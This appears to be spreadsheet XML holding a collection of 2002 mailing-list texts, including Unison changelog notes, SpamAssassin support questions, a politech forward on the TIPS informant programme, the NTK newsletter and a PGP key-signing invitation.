                    # NEW is replaced by the name of a temporary file
                      that Unison expects to be written by the merge
                      program when it finishes, giving the desired new
                      contents of the file; and
                    # OLD is replaced by the name of the backed up copy
                      of the original version of the file (i.e., its
                      state at the end of the last successful run of
                      Unison), if one exists (applies only to merge, not
                      merge2).
                 For example, on Unix systems setting the merge
                 preference to   merge = diff3 -m CURRENT1 OLD CURRENT2 &gt; NEW
                 will tell Unison to use the external diff3 program for
                 merging.
                 A large number of external merging programs are
                 available. For example, emacs users may find the
                 following convenient:    merge2 = emacs -q --eval '(ediff-merge-files "CURRENT1" "CURRENT2"
               nil "NEW")'
    merge = emacs -q --eval '(ediff-merge-files-with-ancestor
               "CURRENT1" "CURRENT2" "OLD" nil "NEW")'
                 (These commands are displayed here on two lines to avoid
                 running off the edge of the page. In your preference
                 file, each should be written on a single line.)
               o If the external program exits without leaving any file
                 at the path NEW, Unison considers the merge to have
                 failed. If the merge program writes a file called NEW
                 but exits with a non-zero status code, then Unison
                 considers the merge to have succeeded but to have
                 generated conflicts. In this case, it attempts to invoke
                 an external editor so that the user can resolve the
                 conflicts. The value of the editor preference controls
                 what editor is invoked by Unison. The default is emacs.
               o Please send us suggestions for other useful values of
                 the merge2 and merge preferences -- we'd like to give
                 several examples in the manual.
     * Smaller changes:
          + When one preference file includes another, unison no longer
            adds the suffix '.prf' to the included file by default. If a
            file with precisely the given name exists in the .unison
            directory, it will be used; otherwise Unison will add .prf,
            as it did before. (This change means that included preference
            files can be named blah.include instead of blah.prf, so that
            unison will not offer them in its 'choose a preference file'
            dialog.)
          + For Linux systems, we now offer both a statically linked and
            a dynamically linked executable. The static one is larger,
            but will probably run on more systems, since it doesn't
            depend on the same versions of dynamically linked library
            modules being available.
          + Fixed the force and prefer preferences, which were getting
            the propagation direction exactly backwards.
          + Fixed a bug in the startup code that would cause unison to
            crash when the default profile (~/.unison/default.prf) does
            not exist.
          + Fixed a bug where, on the run when a profile is first
            created, Unison would confusingly display the roots in
            reverse order in the user interface.
     * For developers:
          + We've added a module dependency diagram to the source
            distribution, in src/DEPENDENCIES.ps, to help new prospective
            developers with navigating the code.
   Changes since 2.6.11:
     * INCOMPATIBLE CHANGE: Archive format has changed.
     * INCOMPATIBLE CHANGE: The startup sequence has been completely
       rewritten and greatly simplified. The main user-visible change is
       that the defaultpath preference has been removed. Its effect can
       be approximated by using multiple profiles, with include
       directives to incorporate common settings. All uses of defaultpath
       in existing profiles should be changed to path.
       Another change in startup behavior that will affect some users is
       that it is no longer possible to specify roots both in the profile
       and on the command line.
       You can achieve a similar effect, though, by breaking your profile
       into two:
  default.prf =
      root = blah
      root = foo
      include common  common.prf =
       Now do  unison common root1 root2
       when you want to specify roots explicitly.
     * The -prefer and -force options have been extended to allow users
       to specify that files with more recent modtimes should be
       propagated, writing either -prefer newer or -force newer. (For
       symmetry, Unison will also accept -prefer older or -force older.)
       The -force older/newer options can only be used when -times is
       also set.
       The graphical user interface provides access to these facilities
       on a one-off basis via the Actions menu.
     * Names of roots can now be ``aliased'' to allow replicas to be
       relocated without changing the name of the archive file where
       Unison stores information between runs. (This feature is for
       experts only. See the ``Archive Files'' section of the manual for
       more information.)
     * Graphical user-interface:
          + A new command is provided in the Synchronization menu for
            switching to a new profile without restarting Unison from
            scratch.
          + The GUI also supports one-key shortcuts for commonly used
            profiles. If a profile contains a preference of the form 'key
            = n', where n is a single digit, then pressing this key will
            cause Unison to immediately switch to this profile and begin
            synchronization again from scratch. (Any actions that may
            have been selected for a set of changes currently being
            displayed will be discarded.)
          + Each profile may include a preference 'label = '
            giving a descriptive string that described the options
            selected in this profile. The string is listed along with the
            profile name in the profile selection dialog, and displayed
            in the top-right corner of the main Unison window.
     * Minor:
          + Fixed a bug that would sometimes cause the 'diff' display to
            order the files backwards relative to the main user
            interface. (Thanks to Pascal Brisset for this fix.)
          + On Unix systems, the graphical version of Unison will check
            the DISPLAY variable and, if it is not set, automatically
            fall back to the textual user interface.
          + Synchronization paths (path preferences) are now matched
            against the ignore preferences. So if a path is both
            specified in a path preference and ignored, it will be
            skipped.
          + Numerous other bugfixes and small improvements.
   Changes since 2.6.1:
     * The synchronization of modification times has been disabled for
       directories.
     * Preference files may now include lines of the form include ,
       which will cause name.prf to be read at that point.
     * The synchronization of permission between Windows and Unix now
       works properly.
     * A binding CYGWIN=binmode in now added to the environment so that
       the Cygwin port of OpenSSH works properly in a non-Cygwin context.
     * The servercmd and addversionno preferences can now be used
       together: -addversionno appends an appropriate -NNN to the server
       command, which is found by using the value of the -servercmd
       preference if there is one, or else just unison.
     * Both '-pref=val' and '-pref val' are now allowed for boolean
       values. (The former can be used to set a preference to false.)
     * Lot of small bugs fixed.
   Changes since 2.5.31:
     * The log preference is now set to true by default, since the log
       file seems useful for most users.
     * Several miscellaneous bugfixes (most involving symlinks).
   Changes since 2.5.25:
     * INCOMPATIBLE CHANGE: Archive format has changed (again).
     * Several significant bugs introduced in 2.5.25 have been fixed.
   Changes since 2.5.1:
     * INCOMPATIBLE CHANGE: Archive format has changed. Make sure you
       synchronize your replicas before upgrading, to avoid spurious
       conflicts. The first sync after upgrading will be slow.
     * New functionality:
          + Unison now synchronizes file modtimes, user-ids, and
            group-ids.
            These new features are controlled by a set of new
            preferences, all of which are currently false by default.
               o When the times preference is set to true, file
                 modification times are propaged. (Because the
                 representations of time may not have the same
                 granularity on both replicas, Unison may not always be
                 able to make the modtimes precisely equal, but it will
                 get them as close as the operating systems involved
                 allow.)
               o When the owner preference is set to true, file ownership
                 information is synchronized.
               o When the group preference is set to true, group
                 information is synchronized.
               o When the numericIds preference is set to true, owner and
                 group information is synchronized numerically. By
                 default, owner and group numbers are converted to names
                 on each replica and these names are synchronized. (The
                 special user id 0 and the special group 0 are never
                 mapped via user/group names even if this preference is
                 not set.)
          + Added an integer-valued preference perms that can be used to
            control the propagation of permission bits. The value of this
            preference is a mask indicating which permission bits should
            be synchronized. It is set by default to 0o1777: all bits but
            the set-uid and set-gid bits are synchronised (synchronizing
            theses latter bits can be a security hazard). If you want to
            synchronize all bits, you can set the value of this
            preference to -1.
          + Added a log preference (default false), which makes Unison
            keep a complete record of the changes it makes to the
            replicas. By default, this record is written to a file called
            unison.log in the user's home directory (the value of the
            HOME environment variable). If you want it someplace else,
            set the logfile preference to the full pathname you want
            Unison to use.
          + Added an ignorenot preference that maintains a set of
            patterns for paths that should definitely not be ignored,
            whether or not they match an ignore pattern. (That is, a path
            will now be ignored iff it matches an ignore pattern and does
            not match any ignorenot patterns.)
     * User-interface improvements:
          + Roots are now displayed in the user interface in the same
            order as they were given on the command line or in the
            preferences file.
          + When the batch preference is set, the graphical user
            interface no longer waits for user confirmation when it
            displays a warning message: it simply pops up an advisory
            window with a Dismiss button at the bottom and keeps on
            going.
          + Added a new preference for controlling how many status
            messages are printed during update detection: statusdepth
            controls the maximum depth for paths on the local machine
            (longer paths are not displayed, nor are non-directory
            paths). The value should be an integer; default is 1.
          + Removed the trace and silent preferences. They did not seem
            very useful, and there were too many preferences for
            controlling output in various ways.
          + The text UI now displays just the default command (the one
            that will be used if the user just types ) instead of
            all available commands. Typing ? will print the full list of
            possibilities.
          + The function that finds the canonical hostname of the local
            host (which is used, for example, in calculating the name of
            the archive file used to remember which files have been
            synchronized) normally uses the gethostname operating system
            call. However, if the environment variable
            UNISONLOCALHOSTNAME is set, its value will now be used
            instead. This makes it easier to use Unison in situations
            where a machine's name changes frequently (e.g., because it
            is a laptop and gets moved around a lot).
          + File owner and group are now displayed in the ``detail
            window'' at the bottom of the screen, when unison is
            configured to synchronize them.
     * For hackers:
          + Updated to Jacques Garrigue's new version of lablgtk, which
            means we can throw away our local patched version.
            If you're compiling the GTK version of unison from sources,
            you'll need to update your copy of lablgtk to the developers
            release, available from
            http://wwwfun.kurims.kyoto-u.ac.jp/soft/olabl/lablgtk.html
            (Warning: installing lablgtk under Windows is currently a bit
            challenging.)
          + The TODO.txt file (in the source distribution) has been
            cleaned up and reorganized. The list of pending tasks should
            be much easier to make sense of, for people that may want to
            contribute their programming energies. There is also a
            separate file BUGS.txt for open bugs.
          + The Tk user interface has been removed (it was not being
            maintained and no longer compiles).
          + The debug preference now prints quite a bit of additional
            information that should be useful for identifying sources of
            problems.
          + The version number of the remote server is now checked right
            away during the connection setup handshake, rather than
            later. (Somebody sent a bug report of a server crash that
            turned out to come from using inconsistent versions: better
            to check this earlier and in a way that can't crash either
            client or server.)
          + Unison now runs correctly on 64-bit architectures (e.g. Alpha
            linux). We will not be distributing binaries for these
            architectures ourselves (at least for a while) but if someone
            would like to make them available, we'll be glad to provide a
            link to them.
     * Bug fixes:
          + Pattern matching (e.g. for ignore) is now case-insensitive
            when Unison is in case-insensitive mode (i.e., when one of
            the replicas is on a windows machine).
          + Some people had trouble with mysterious failures during
            propagation of updates, where files would be falsely reported
            as having changed during synchronization. This should be
            fixed.
          + Numerous smaller fixes.
   Changes since 2.4.1:
     * Added a number of 'sorting modes' for the user interface. By
       default, conflicting changes are displayed at the top, and the
       rest of the entries are sorted in al</t>
  </si>
  <si>
    <t>use Perl Daily NewsletterIn this issue:
    * Call for Perl Monger T-Shirts at YAPC::Europe
    * This Week on perl5-porters (11-18 August 2002)+--------------------------------------------------------------------+
| Call for Perl Monger T-Shirts at YAPC::Europe                      |
|   posted by ziggy on Monday August 19, @08:53 (yapce)              |
|   http://use.perl.org/article.pl?sid=02/08/19/1254219              |
+--------------------------------------------------------------------+[0]neophyte writes "If you come to YAPC::Europe 2002, and you are a
member of a Perlmonger group, and your group has its own t-shirts, then
please bring one to YAPC::Europe for the auction. Show off the creativity
of your group and give someone else the chance to have such a nice
t-shirt as yours."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/19/1254219Links:
    0. mailto:niederrhein-pm@web.de
+--------------------------------------------------------------------+
| This Week on perl5-porters (11-18 August 2002)                     |
|   posted by pudge on Monday August 19, @10:12 (summaries)          |
|   http://use.perl.org/article.pl?sid=02/08/19/1230217              |
+--------------------------------------------------------------------+&gt;&gt;From sunny and hot and about to burst out in thunderstorms, downtown
Echt, comes this weeks perl5-porters summary, brought to you by Elizabeth
Mattijsen.This story continues at:
    http://use.perl.org/article.pl?sid=02/08/19/1230217Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/19/1230217Copyright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</si>
  <si>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Hi....i installed razor an SpamAssassin on an redhat 6.3 with a fresh per 5.8.0.
when I install Mail::SpamAssassin using the CPAN the followin error in make
test appears.t/forged_rcvd...........ok
t/nonspam...............ok
t/razor.................        Test skipped: Razor is not installed.
t/razor.................ok
        2/2 skipped: Razor is not installed.
t/reportheader..........okHow can i get the razor running with the SpamAssassin ?Thanks for helpingAlex-------------------------------------------------------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</si>
  <si>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Yea.. this isn't newsworthy...This is a forwarded message
From: Declan McCullagh 
To: politech@politechbot.com
Date: Sunday, July 14, 2002, 8:06:38 PM
Subject: FC: Bush administration readies nationwide informant program===8&lt;==============Original message text===============
The link:
http://www.citizencorps.gov/tips.html---Date: Sun, 14 Jul 2002 20:59:54 +0000
From: "J.D. Abolins" 
Subject: Aussie paper: US planning to recruit one in 24 Americans as citizen
  spiesAnybody ever heard of Pavlik Morozov? (If not see 
http://www.cyberussr.com/rus/morozov.html for a quick blurb about the 
fellow.) When I see proposals to mobilize American people into being eyes 
and ears fo the government, I am reminded of Pavilik and his family.Now I am not against people reporting certain things to the police. It is 
the habit of being constantly suspicious of neighbors, co-workers, and 
otehrs that can become destructive. Down the line it can lead to suspicions 
based not on significant clues but upon things such as "fails to display 
sufficient respect for authority", "laughs whenever the phrase 'homeland 
security' is used", and "hangs out with anti-social misfits." It is an all 
too easy slide from neighbors watching out for each and helping the 
community to becoming agents of the state.J.D. AbolinsPS: Why is it that the most revealing news reports about the USA are coming 
nowadays form the UK, Aussie, and other non-USA media? 
--------------
 From the Sydney Morning Herald Web site 15 July 2002
http://www.smh.com.au/articles/2002/07/14/1026185141232.htmlUS planning to recruit one in 24 Americans as citizen spies
By Ritt Goldstein
July 15 2002The Bush Administration aims to recruit millions of United States citizens 
as domestic informants in a program likely to alarm civil liberties groups.The Terrorism Information and Prevention System, or TIPS, means the US will 
have a higher percentage of citizen informants than the former East Germany 
through the infamous Stasi secret police. The program would use a minimum 
of 4 per cent of Americans to report "suspicious activity".Civil liberties groups have already warned that, with the passage earlier 
this year of the Patriot Act, there is potential for abusive, large-scale 
investigations of US citizens.As with the Patriot Act, TIPS is being pursued as part of the so-called war 
against terrorism. It is a Department of Justice project.Highlighting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recruits.A pilot program, described on the government Web site www.citizencorps.gov, 
is scheduled to start next month in 10 cities, with 1 million informants 
participating in the first stage. Assuming the program is initiated in the 
10 largest US cities, that will be 1 million informants for a total 
population of almost 24 million, or one in 24 people.[...]
-------------------------------------------------------------------------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
Like Politech? Make a donation here: http://www.politechbot.com/donate/
-------------------------------------------------------------------------===8&lt;===========End of original message text===========-- 
Best regards,
 karee                            mailto:karee@tstonramp.com
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">bugzilla-daemon@hughes-family.org wrote:
&gt; http://www.hughes-family.org/bugzilla/show_bug.cgi?id=704
&gt; ok, this is now fixed. cheers!How did you fix it? By creating the pidfile as the "-u" user?
If so, you should add this to the documentation since it prevents
the use of the standard /var/run directory (which is only writable
by root).
+Thomas-- 
Thomas Anders 
Hahn-Meitner-Institut Berlin, Germany
</t>
  </si>
  <si>
    <t>Hi,when testing spamassassin, i found a little problem but
I don't know if it's spamassassin or my pop3-server
that caused it.Pop3-servers seem to expect a blank line before "From "-lines
to seperate mails in a mailbox-file.
Spamassassin does not add such a blank line before
mails delivered directly to mailbox.
Result is that the pop3-server (tested with qpopper4 and
cucipop) delivers some mails glued together.I think the solution is to write a blank line to the mailbox
befor spamassassin adds the filtered mail.Please tell me if you're not the right man for this,
 if i'm totally wrong or if you're sure, the pop3-server
 shouldn't insist on a blank line before "From "-lines.Thank you.PS: Mailserver ist postfix-1.1.11Regards,-- 
Frank Burkhardt    phone: +49 341 9940-142
                                    fax  : +49 341 9940-221
Max Planck Institute
of Cognitive Neuroscience           /"\
Muldentalweg 9                      \ / ASCII Ribbon Campain
04828 Bennewitz, Germany             X  against HTML Mail
                                    / \</t>
  </si>
  <si>
    <t xml:space="preserve">
On Tuesday, August 20, 2002, at 07:23  AM, Justin Mason wrote:&gt;&gt; The compensate rule USER_AGENT should go or at least score 
&gt;&gt; very low; with
&gt;&gt; it, a spammer just has to include a header like
&gt;
&gt; BTW, the scores are irrelevant right now (unless the test is 
&gt; going to have
&gt; a non-GA'd score).  The GA should reduce "easy" ones, and if it 
&gt; doesn't,
&gt; after the GA run is the time to comment.  Don't pay any 
&gt; attention to them!
&gt; ;)Remember that the GA is going to be considering combinatorial 
uses of the rules, so rules which look dodgy on their own might 
be gems for the GA -- perhaps something with a S/O ratio of .5 
actually occurs often in combination with some other rule, and 
in those situations, helps to distinguish spam vs nonspam.C-------------------------------------------------------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</si>
  <si>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/etc/cron.daily/tripwire-check:****    Error: Tripwire database for jalapeno not found.    ****
**** Run /etc/tripwire/twinstall.sh and/or tripwire --init. ****</t>
  </si>
  <si>
    <t xml:space="preserve"> _   _ _____ _  __ &lt;*the* weekly high-tech sarcastic update for the uk&gt;
| \ | |_   _| |/ / _ __   __2002-08-23_ o join! mail an empty message to
|  \| | | | | ' / | '_ \ / _ \ \ /\ / / o ntknow-subscribe@lists.ntk.net
| |\  | | | | . \ | | | | (_) \ v  v /  o website (+ archive) lives at:
|_| \_| |_| |_|\_\|_| |_|\___/ \_/\_/   o     http://www.ntk.net/
         "Using a laptop computer in the shadow of Big Ben, we
         identified 26 parcels of confidential computer information."
                    - and inside each was a delicious chocolate treat
www.sundaymirror.co.uk/homepage/news/page.cfm?objectid=12125585&amp;method=sm_full
                                &gt;&gt; HARD NEWS &lt;&lt;
                              here falls shoe two         Well, it's getting late, and the government hasn't fallen,
         so we better roll the presses on the bad news. The CAMPAIGN
         FOR DIGITAL RIGHTS published its first in-depth analysis of
         the EUCD. For this exciting installment, CD-R has
         concentrated on what it does to people who have to
         circumvent copy protection to do their job. The short
         summary is: if they're not a teacher, a prison warder,
         disabled, or the cops, they can forget their jobs. If you're
         anyone else - like a musician, or a cryptographer -  and the
         copy protection says you can't make a backup, you can't. And
         even if you *are* a teacher or other exceptional person,
         you'll have to ask the Secretary of State if you can crack
         the protected CD. In writing. Each time.
         http://uk.eurorights.org/issues/eucd/ukimpl/
                                     - oh, don't worry, it gets worse
         http://www.stand.org.uk/weblog/archive/2002/08/21/000243.php
                                   - what you can do to stop all this         But there's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it's
         not just mod-chip sellers who are liable. Anyone who
         distributes such satanic machines is also a perp.
         http://www.stand.org.uk/weblog/archive/2002/08/21/000243.php
                                   - what you can do to stop all this         That's not going to go down well with ANDREW SIMMONS.
         Regular NTK readers will remember Andrew as a lightning rod
         to lawyers. Not only was he John Doe #13 in the American
         DeCSS case, but in a completely unrelated affair, he waws
         threatened with all manner of nastiness just for publishing
         his list of doomed dotcoms on his Website [NTK 2000-09-22].
         In the last week, he's had another letter via Demon, finally
         ordering him to remove his shiny "circumvention device" (aka
         DeCSS) from his site. It sounds like the lawyers may have
         shot their wad a tad early: the EUCD rules don't kick in
         until Christmas. But when the new laws do hit, and if what
         Andrew's preposterous correspondent says is believed in a UK
         court, hosting DeCSS *will* mean jail. There's been some
         talk about how the EUCD rules are better than the DMCA,
         because they specifically exclude computer programs from the
         new rules. Well, it looks like DeCSS is no longer just a
         computer program. From now on, it could become a special "nick me"
         tag for your Website.
         http://www.xenoclast.org/free-sklyarov-uk/2002-August/002923.html
                                                   - here we go again
         http://www.stand.org.uk/weblog/archive/2002/08/21/000243.php
                                           - CLICK ON THE DAMN LINK
                                &gt;&gt; ANTI-NEWS &lt;&lt;
                             berating the obvious         surely approaching the end of the PUERILE GOOGLE MISSPELLINGS
         soon: http://www.google.com/search?&amp;q=%22penny+farting%22 vs
         http://groups.google.com/groups?q=%22whitewater+farting%22 -
         we suspect some people are using "poofreading" deliberately,
         but probably not "potable document format", or the enigmatic:
         http://www.google.com/search?q=%22To+Be+Set+Browser+Caption%22
         ... presumably meant "interfaith" (unless of course they're
         Mac loyalists): http://www.ntk.net/2002/08/23/dohfaith.gif ...
         banner ads haven't been getting any less inappropriate either:
         http://www.ntk.net/2002/08/23/dohcruz.gif ... A Keyboard,
         Yesterday: http://news.bbc.co.uk/1/hi/technology/2208216.stm
         ..."A levles" in "Phisics, Information Technoligies, Languges":
  www.elance.com/c/fp/main/viewprofile.pl?view_person=insspirito&amp;catid=10231
         ... "Alcohol makes others better-looking" - scientists' shock
         finding: http://www.msnbc.com/news/796225.asp ... not judging
         them or anything: http://www.ntk.net/2002/08/23/dohsin.gif ...
         experience required in handling the *really* big accounts:
         http://www.ntk.net/2002/08/23/dohgod.gif ...
                               &gt;&gt; EVENT QUEUE &lt;&lt;
                         goto's considered non-harmful         Is it just us, but just 5 years after Lara Croft appeared on
         the cover of "The Face", could it be that the PlayStation is
         now even cooler than ever? As if anyone had any doubts, next
         week's PLAYSTATION EXPERIENCE (from Thu 2002-08-29, Earl's
         Court, London) features exclusive demos of imminent releases,
         teen band "Blazing Squad", skateboarding, BMXing, plus DJ sets
         from the likes of XFM bootleggers James Hyman and Eddie
         Temple-Morris. And, best of all, Sony are charging you a mere
         UKP8 (plus booking fee) for the privilege of allowing them to
         market all their upcoming titles to you.
         http://www.ects.co.uk/pressmore.html?type=1&amp;articleID=43
           - still, Gareth "Gaz Top" Jones is hosting the ECTS awards
         http://www.caextreme.org/
                   - coin-op collectors hit San Jose in 2 weeks' time
         http://www.cobd.co.uk/yakfestpage.htm
                       - Llamasoft all-dayer in Oxford pub end of Sep
         http://www.frightfest.co.uk/programme2002.html
              - this weekend: horror film fest in London, with "Lupo"
                                &gt;&gt; TRACKING &lt;&lt;
               sufficiently advanced technology : the gathering         The crazy counterintuitive conditional probability world of
         BAYES THEOREM has a reputation for making judges look stupid
         in DNA-testing murder cases, and search-engines look even
         stupider when they suggest "relevant documents" - but it's
         getting a bit of a re-renaissance in the spam filtering
         world. Tradition states Naive Bayesian alone doesn't work
         well enough at filtering by example, so it's good to see
         dozens of people independently sloshing around the noospere
         looking for better tweaked solutions. Including, of course,
         leading noosphere cadet ERIC S RAYMOND, whose Bayesian
         BOGOFILTER is fast, has extra smarts, and is up to version
         0.2. Unfortunately, as with Raymond's abandoned kernel
         configurator and recent anti-gay anti-islam anti-vegetable
         rants, it requires taking on board just a *bit* too
         much extra baggage to really take off. Rennies' IFILE around
         has been around for a while, and has support for MH and
         mutt. Gary Arnold's BAYESPAM is something he knocked up in
         Perl for qmail; a good start if you want to try this
         yourself. Which you should, because nobody's cracked it yet.
         http://www.paulgraham.com/spam.html
                   - what i did after i invented another new language
http://www.sjdm.org/mail-archive/jdm-society/2000-November/002244.html
- so, given a probability of 1% that a judge has understood Bayes before
         http://tuxedo.org/~esr/bogofilter/bogofilter.html
     - of course some say the bogofilter should be on ESR's outgoing mail
         http://www.ai.mit.edu/~jrennie/ifile/
                                                 - leading by example
         http://www.garyarnold.com/projects.php#bayespam
                                - "Don't hurt me, I'm a C programmer!"
                                &gt;&gt; MEMEPOOL &lt;&lt;
                ceci n'est pas une http://www.gagpipe.com/         worth it for the elaborate assembly instructions/ blank page
         excuses alone: http://www.log.dial.pipex.com/things/ ...
     http://news.yahoo.com/news?tmpl=story2&amp;u=/nm/20020822/ts_nm/bush_dc_14
         vs http://www.theonion.com/onion3724/bush_vows_to_remove.html
         ... be a bit funnier if it read them out in her voice as
         well: http://homepage.ntlworld.com/l_tabraham/jbrr.htm ...
         hey, in future, why not try sending us these while they're
         still vaguely topical?: http://www.chthonic.f9.co.uk/24/ vs
         http://thesurrealist.co.uk/24/ ... When Audiophiles Attack #5
         (or #6?) - THE QUANTUM PURIFIER: http://www.bybeetech.com/ vs
     http://www.showandtellmusic.com/pages/galleries/gallery_q/morse.html
         ... when oh when will the bloggers tire of putting a new word
         in front of "chalking"?: http://zapatopi.net/psychalking.html
         ... just one small step closer to "Star Trek" warp drives:
         http://physicsweb.org/article/news/6/8/11/ ... doing well for
         "teaser openings": http://humanity.berlios.de/usr-bin-perl/
         ... CRONENBERG to direct (one of two) upcoming JUDGE DREDD
         movies?... bloody students: http://www.elve.net/rtips0b.htm ...
                                &gt;&gt; GEEK MEDIA &lt;&lt;
                                  get out less         TV&gt;&gt; the week's late-night sci-fi selection starts off with
         Yul Brunner 1970s post-apocalyptic beat-em-up THE ULTIMATE
         WARRIOR (12.40am, Fri, C5), John "The Last Seduction" Dahl's
         bonkers brainscanner UNFORGETTABLE (2.05am, Fri, C4), and the
         seems-to-last-an-eternity STARGATE (11.05pm, Sat, BBC1)... the
         BBC have swiftly replaced the advertised showing of serial
         killer psycho-profiler "Messiah 2" with repeats of THE LOST
         WORLD (9.15pm, Sat, BBC1)... and, considering what came after,
         AMERICAN PIE (9.05pm, Sat, C4) may be eventually regarded as
         one of the great teen movies of all time... it's a double-
         Arnie fertility-horror double-bill in TWINS (6.20pm, Sun,
         BBC1) and JUNIOR (4.50pm, Mon, BBC1)... Nell McAndrew and
         Rhona Cameron contribute to a slightly vague interpretation of
         "celebrity" in I'M A CELEBRITY - GET ME OUT OF HERE! (8pm,
         Sun, ITV)... WHEN [DIANA] DIED - DEATH OF A PRINCESS (9pm,
         Sun, C4) contains "scenes of nudity and religious ritual" -
         funny what people find offensive nowadays ... and Jeff "Tron"
         Bridges plays the other half of that K-Pax double-act in
         STARMAN (2.30pm, Mon, C5) - all together now: "You don't
         understand, Mrs Hayden: that *thing* is no longer your
         husband!"... archaeology imitates "Coneheads" in ANCIENT
         MURDER MYSTERY: RIDDLE OF THE CONE-SHAPED SKULLS (8pm, Mon,
         C5)... odd scheduling for Bill Murray's kid-friendly identity
         mixup THE MAN WHO KNEW TOO LITTLE (11.05pm, Tue, BBC1)... and
         if only they'd got hold of Tim Burton's recent "reimagining"
         to show after the run of BATTLE FOR/ FAREWELL TO/ BACK TO
         THE PLANET OF THE APES (1.30pm, Tue-Thu, ITV), you could have
         watched the franchise deteriorate before your very eyes...         FILM&gt;&gt; good to see Time Magazine's staff staying cool long
         enough to publish their final "Humanity Doomed" collectors'
         edition for the backstory of "X-Files" director Rob Bowman's
         "2000AD"-style Brit-set monster apocalypse REIGN OF FIRE
         ( http://www.capalert.com/capreports/reignoffire.htm : "Here's
         to evolution!"; many deaths by incineration; child permitted
         in hardhat construction area; massive tattoos)... it's Martin
         "Bad Boys" Lawrence and Academy Award nominee Tom "In The
         Bedroom" Wilkinson - together at last! - in funnier-than-
         you'd-expect "Galaxy Quest"/"A Knight's Tale" hybrid BLACK
         KNIGHT ( http://www.screenit.com/movies/2001/black_knight.html :
         [Lawrence] does all sorts of mugging and facial contortions at
         the camera that some kids might want to imitate; we hear the
         King fart at dinner; some kids might want to imitate all of
         the action-based fighting that occurs)... or there's badfilm
         stalwart Heather Graham and "My Cousin Vinny" Academy Award
         winner Marisa "In The Bedroom" Tomei in clumsy Bollywood porn
         comedy pastiche THE GURU ( http://www.bbfc.co.uk/ : Contains
         strong sex references and language)...         DRESS DOWN FRIDAY&gt;&gt; after an unexpected 3-month hiatus -
         because, hey, who buys t-shirts in the summer? - NTK's online
         store is back to full strength at http://www.geekstyle.co.uk/
         and now features lengthy explanations of exactly what PayPal
         will attempt to charge you. Also new this month: lots of
         designs now available in XXL, including the ever-popular 404
         /SHIRT/TIE NOT FOUND, a glow-in-the-dark variant of the ZX
         font BORN TO RUN one, plus slightly more limited numbers of
         the arcade-style HI-SCORE TABLE and the last few remaining
         souvenirs from June's EXTREME COMPUTING show. Oh and copies of
         Mark Bennett's BLACK ICE magazine (for just US$7 plus postage
         and packing) - Brighton's very own answer to "Mondo 2000"...
         meanwhile, your entries have continued to flood in, a leading
         contender being CHRIS HOWE's possibly Designers-Republic-
         influenced http://www.geekstyle.co.uk/images/chrismessiah.gif
         - though his email address appears to have changed recently,
         so if anyone knows where he is, could you ask him to get in
         touch? We also enjoyed JAMES SWIFT's politically motivated
         http://www.3dengineer.com/tshirts/privacylogged.gif , BRUCE's
         heartfelt http://www.growf.org/shirts/crack.gif , and ASHLEY
         POMEROY's whimsical http://www.ashleypomeroy.com/arpshirts.gif
         - but remained puzzled by people sending us what appear to be
         parodies of our existing parody designs, from OWAIN KENWAY's
         http://www.angelfire.com/scifi2/dsky/1337spotting.html through
         to JOF's http://www.overhope.org.uk/misc/revolution.jpg and
         PAUL "THE FRIDAY THING" CARR's perhaps over-self-explanatory:
         http://www.geekstyle.co.uk/images/tft-shirt.jpg . And if your
         design skills aren't up to this high standard, you can of
         course just mail us a text slogan, so long as it's at least as
         funny as SIMON LIPSON's "NTK: ROTFL meets ROT-13", ANDREW
         SIMMONS' "NTK: Notes you don't want to save, and for link
         evaluation", or PHIL SOUTH's "Frieze - Marther - Farquhar" -
         but designed to look like it's the name of a law company!...
         meanwhile, the http://www.geekstyle.co.uk/images/ gallery
         reveals the "Buy One, Subvert The Mass Media, Get One Free"
         contest to be hotting up once again, as 25-year-old web
         designer GRAEME DAVISON "just happened" to be wearing the
         shirt that spells "fuck" in ASCII URL-encoding when he was
         photographed by THE NORTHERN ECHO about his trip to see
         "Attack Of The Clones" open in LA. Even though this was only a
         local newspaper, the judging panel felt he deserved the full
         prize (of another t-shirt), as the story goes on to cover the
         ostensibly pointless nature of the entire exercise. That's the
         kind of product placement that money just can't buy...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"geeks", apparently
                              http://anews.co.uk/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</si>
  <si>
    <t xml:space="preserve">Anyone interested in a pgp/gpg key-signing get-together @ DC,
please email me your key info (name, key ID, type, size,
fingerprint), and I will add you to the list.If you don't have a PGP key, now is a great time to make one.Want to find out more about PGP?
You can get the software from:PGPfreeware 
GnuPG (GPG) 
Bring the following:   *  Photo ID (your name must be in your key identity)
   *  A printed copy of your key ID, key type, fingerprint, and key sizeI will pass out a master list (from what people send me now). Then
individually we will cross-validate eachothers identities and keys.It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list.The reverse is then done for person B.After a while you will end up with a list full of (hopefully) checked
names. Later on, you can retrieve a copy of the key either from a
keyserver or directly from the owner, verify it's valid (it matches the
checked off name on your copy of the master list), and sign it using
your private key.Then you can upload your signature of the key to a key server and send a
copy back to the key's owner to add to thier keyring.ID:    Mark Renouf 
Size:  2048
Type:  DH/DSS
KeyID: 0xF888F464
Fingerprint: 9CE7 98DD E14E 8B9C 7109  2798 C18D 83A9 F888 F464--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Amis-v or there is another prefs file that SA is using. I had a heck of a time
figuring out where to find my site wide file because of my configuration.If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local.cf in the /etc/mail/spamassassin directory. Assuming a
default install.Theo Van Dinter wrote:
&gt; 
&gt; On Wed, Jul 24, 2002 at 10:18:28AM -0500, Stewart, John wrote:
&gt; &gt; X-Virus-Scanned: by amavisd-new amavisd-new-20020630
&gt; &gt; X-Spam-Status: No, hits=6.5 tagged_above=5.1 required=6.9 tests=PLING,
&gt; &gt; MONEY_BACK, CLICK_BELOW, POR
&gt; &gt; N_14, CLICK_HERE_LINK, FREQ_SPAM_PHRASE
&gt; &gt; X-Razor-id: d92173a8dfc60567e55efcf6bf264fd7f7a7369a
&gt; &gt;
&gt; &gt; Doesn't hits=6.5 mean that it should be tagged as spam? Why the
&gt; &gt; X-Spam-Status of no then?
&gt; 
&gt; required is 6.9, it only scored 6.5, so it's not spam according to SA.
&gt; 
&gt; &gt; Why is required=6.9 if I have required_hits at 5 in the local.cf? Where the
&gt; &gt; heck does that number come from?
&gt; &gt;
&gt; &gt; Also, what is tagged_above=? I cannot find any information about it on the
&gt; &gt; SpamAssassin site.
&gt; 
&gt; Good questions...  "tagged_above" doesn't appear anywhere in SA (at
&gt; least according to `find`).  I would guess it's amavis doing some
